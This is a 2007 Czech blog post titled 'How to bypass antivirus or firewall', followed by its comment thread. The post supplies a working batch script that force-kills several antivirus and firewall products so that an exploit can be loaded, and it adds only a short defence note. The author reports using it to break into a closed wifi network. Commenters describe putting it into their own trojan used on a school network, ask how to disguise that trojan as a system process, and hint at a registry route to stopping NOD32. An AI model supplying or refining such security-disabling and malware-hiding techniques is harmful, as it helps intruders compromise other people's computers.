Jak obejít antivir či firewall Mozektevidi.net - Mozektevidi.net.

Jak obejít antivir či firewall

Je tomu už dávno, co jsem vymyslel jednoduchý způsob, jak se zbavit antiviru a firewallu, pokud máme přístpup k počítači

image of Jak obejít antivir či firewall

Staré dobré dávkové příkazy

Pokud někdo má pouze minimum času a potřebuje do počítače nahrát nějaký exploit, nemůže se zdržovat ručním vypínáním antivirů. Pro takové případy se hodí krátký, jednoduchý a primitivní dávkový BAT skript:

@Echo off
color 00
taskkill /f /t /im kpf*
taskkill /f /t /im nod32krn.exe
taskkill /f /t /im nod32kui.exe
taskkill /f /t /im PERSFW.exe
taskkill /f /t /im ashDisp.exe
taskkill /f /t /im ashMaiSv.exe
taskkill /f /t /im ashServ.exe
taskkill /f /t /im ashWebSv.exe
taskkill /f /t /im ashUpdSv.exe
taskkill /f /t /im AVGUARD.exe
taskkill /f /t /im AVGNT.exe
exit

Ukončení známých antivirů a SW firewalů

Tento skript nejprve nastaví černé písmo na černém pozadí a ukončí kerio personal firewall, nod32, avast i avg antivirus.. Jednodušeji a rychleji to už nejde. Dávkové skripty ještě neztratili své kouzlo. Mrknutí

Obrana

Jedinou obranou je nikoho nepouštět k počítači a nepřihlašovat se s administrátorskými právy. Microsoft Windows XP má defalutní účty s admin právy a hodně BFU uživatelů se pod nimi přihlašuje. Další obranou je, začít používat linux.


autor článku OS | datum publikování 12.červen.2007 16:48 | články o IT bezpečnosti a obraně proti hackingu IT bezpečnost |

Kometáře

#1 jumboom www

Mno pěkný, to se ještě bude hodit, vid InToSSHi? :-D reaguj

datum 12.06.2007 16:55

unknown unknown

#2 mr.Crow wwwdisposed.xf.cz

no...moje Kerio tím neshodíš :-) reaguj

datum 12.06.2007 18:48

unknown unknown

#3 MzK wwwmozektevidi.net

reakce na »mr.Crow«: (mr.Crow) Proč? Jmenuje se procesy tvého keria jinak? Nebo se nepřihlašuješ jako admin? A nebo jsi smazal c:\windows\system32\taskkill.exe reaguj

datum 12.06.2007 18:56

unknown unknown

#4 Phoenix www

No hele na tenhle článek se určitě podívá hoooodně lidí, protože chtěj vědět jak obejít antivir/firewall. V článku se ale dočtou jenom jak rychle shodit všecky procesy nejpoůžívanějších antivirů/firewallů když máte přístup na počítač, kde máte administrátorská práva. Takže vlastně nic moc.
btw zkoušels to už někdy použít v praxi? reaguj

datum 12.06.2007 19:33

unknown unknown

#5 MzK wwwmozektevidi.net

reakce na »Phoenix«: (Phoenix) Dřív jsem měl dávky na spouštění různých úloh a ukončování dalších úloho (záloha systému, kopírování na ftp, vypnutí počítače, puštění aplikace, vypnutí aplikace..) takovej cron v linuxu jenomže se musí pouštět ručně.
Uvedený příklad jsem zkoušel v praxi, když jsem potřeboval získat přístup do uzavřené wifi sítě 8-) a povedlo se reaguj

datum 12.06.2007 19:47

unknown unknown

#6 Stoyan wwwstoyan.ic.cz

Outpost FW (podle me nejlepsi FW pro Win) je proti tomuto zpusobu take imunni. A prechod na Linux ti v tomto pripade take nepomuze, protoze i tam si muzes napsat script v bashi pro ukonceni procesu. reaguj

datum 12.06.2007 20:00

unknown unknown

#7 MzK wwwmozektevidi.net

reakce na »Stoyan«: (Stoyan) Outpost FW tímto způsoben opravdu nejde ukončit, protože běží jako systémový ovladač. Přechod na linux mi v tomto případě pomůže :-P v linuxu si sice můžeš napsat bash, ale ten ti ukončí procesy, které jako běžný uživatel spustil, na ostatní je potřeba heslo roota. Oproti windows, kde se defalutně pouštíš jako admin a můžeš všechno :-P reaguj

datum 12.06.2007 20:11

unknown unknown

#8 jumboom www

trocha OT: co ten dalsi výpadek database? To bylo očekávaný, nebo jim zas něco spadlo? reaguj

datum 12.06.2007 20:14

unknown unknown

#9 [zener] www

Tady je "CRON" pro windows. Dokonce jsem ho vlastnorucne programoval :-D
www.stahuj.cz/utility_a_ostatni…

a tady automaticky ukoncovac :-P
www.stahuj.cz/utility_a_ostatni… reaguj

datum 12.06.2007 21:59

unknown unknown

#10 mr.Crow wwwdisposed.xf.cz

reakce na »Stoyan«: (Stoyan) : třeba můj openSUSE chce heslo roota i při reboot, halt... takže myslím že i při killnutí procesu. Takže bez vyšších práv nic nekillne

reakce na »MzK«: (MzK) : Kerio se mě ptá, jestli může spustit Kill Process reaguj

datum 12.06.2007 22:02

unknown unknown

#11 ObiSkyWalker wwwobiskywalker.blog.cz/

Ještě že mám GNU/Linux :-D reaguj

datum 12.06.2007 22:06

unknown unknown

#12 MzK wwwmozektevidi.net

reakce na »[zener]«: ([zener]) To je ale jednorázový plánovač.. To bych napsal sám v dávce :-P (windows má svoje plánování na spouštění defragmentace či co ale já to nemám, (nlite)).
reakce na »mr.Crow«: (mr.Crow) Opravdu? Mě ne. Jakou máš verzi? Trial či koupený?
Vlastně nic. V Keriu si můžeš zapnout 3 typy ochrany. Systém prevence síťových útoků NIPS (aktive), system prevence útoků na hostitelský systém HIPS a blokování chování aplikací. To bude ončo reaguj

datum 12.06.2007 22:20

unknown unknown

#13 Nobelicek www

Cron ve windows je, jen se nejmenuje cron, ale naplanovane ulohy. reaguj

datum 12.06.2007 22:58

unknown unknown

#14 InToSSH wwwlinuxak.blog.cz

reakce na »jumboom«: (jumboom) Jo to se bude hodit, jeste by to chtelo pridat na killnuti ZoneAlarmu a bude to v pohode, akorat to ma nevyhodu ze jakmile se ten trojan spusti tak nez stihne ukoncit NOD32 tak ten uz hlasí infiltraci. reaguj

datum 13.06.2007 00:05

unknown unknown

#15 MzK wwwmozektevidi.net

reakce na »InToSSH«: (InToSSH) Tento skritp (není to trojan) antiviry nehlásí :-) protože je to na vir moc jednoduchý a protože jsou windows v tomto směru (přístupová práva) špatně udělaný. Jediný co ti může hlásit je SW firewall, který ti oznámí spouštění taskkill -> povolit :-) reaguj

datum 13.06.2007 06:19

unknown unknown

#16 jumboom www

reakce na »MzK«: (MzK) My samozřejmě víme, že tenhle scriptik neni trojan, ale moh by se hodit do naseho trojana :-D Zatim nadherne fungoval na skolni siti.. :-P reaguj

datum 13.06.2007 15:08

unknown unknown

#17 MzK wwwmozektevidi.net

reakce na »jumboom«: (jumboom) V čem je to napsané? A ten váš trojan se kryje za co? reaguj

datum 13.06.2007 15:29

unknown unknown

#18 mS www

(MzK) Nechci nějak otravovat, jsem lam, o hacku nic nevím, ale budiž... jen jsem se chtěl zeptat jestli se tebe jako hackera (resp. tvůj počítač) někdo pokoušel hacknout. Potřebuješ nějaké super-mega-spešl zabezpečení nebo prostě jen normální antivir+fw ?
Díky reaguj

datum 13.06.2007 15:39

unknown unknown

#19 jumboom www

reakce na »MzK«: (MzK) v delphach.. No moje prace to neni, to spachal InToSSH +este jeden typan. Ale tady to nebudem rozebirat, dyztak mejl 8-) ..
reakce na »mS«: (mS) Koukni se líp na starší stránky, nejeden se tim zabejva ;-) reaguj

datum 13.06.2007 16:18

unknown unknown

#20 mr.Crow wwwdisposed.xf.cz

reakce na »MzK«: (MzK) : to bude nejspíš to blokování chování aplikací. Jakmile se spustí aplikace, která není v seznamu povolených, ptá se mě, jestli ji spustit může...výborná věc, i když občas trošku otravná.

A jinak k tomu plánování úloh a cronu... plánovač úloh se taky dá použít jako cron, na konci toho našeho spuštěného programu ještě necháme spustit BAT, který naplánuje další akci... klidně na stejnou dobu nebo na nějakou jinou, třeba v závislosti na nějakých výsledcích toho hlavního spustěného programu... ale komfort jako "bash + cron" Cmd + plánovač úloh rozhodně neposkytuje :-D reaguj

datum 13.06.2007 17:17

unknown unknown

#21 MzK wwwmozektevidi.net

reakce na »mS«: (mS) Ano mám megaspešl zabezpečení - moje návyky. BTW antivir nepoužívám.
reakce na »mr.Crow«: (mr.Crow) jj dřív jsem používál ale čím dál víc mi to lezlo na nervy. Aplikace si ohlídám sám, FW používám pouze proti útokům z venčí reaguj

datum 13.06.2007 18:21

unknown unknown

#22 [zener] www

Kdysi jsem programoval na kamosovu prosbu ukonceni Avastu. Ten je strasne lehce odstrelitelnej.

Horsi je NOD. Podivate-li se do sluzeb, nejde bezne ukoncit. Ani tento mozkuv kill ho neukonci. Zmizi mozna tak ikona z traye, ale nod32krn.exe porad bezi. Na tohle je NOD dost robustni.

Pokud byste ho vsak chteli ukoncit, jde to. Nebudu presne popisovat jak, ale mrknete do stromu HKLM\SYSTEM\CurrentControlSet\Services. Kdo potrebuje, pochopi... reaguj

datum 13.06.2007 18:30

unknown unknown

#23 InToSSH wwwlinuxak.blog.cz

reakce na »MzK«: (MzK) Sry že odpovídám se zpožděnim, přijel jsem domu až ted. Jak řekl Jumboom je to v Delphach, ale s tim krytim nic moc to se jeste musi doresit protoze zatim se to spousti z system32 a jmenuje se treba nwiz32.exe . Takže nic moc, je to psany konzolove. Taky jsme to zkoušeli spoustet jako services.exe, ktery z taskmanageru nejde ukoncit, ale to odhalil lehce antivir. Kdybys měl nějakej nápad jak ho zamaskovat dej pls vědět. THX :-D reaguj

datum 13.06.2007 18:49

unknown unknown

Nové kometáře nejsou povolené.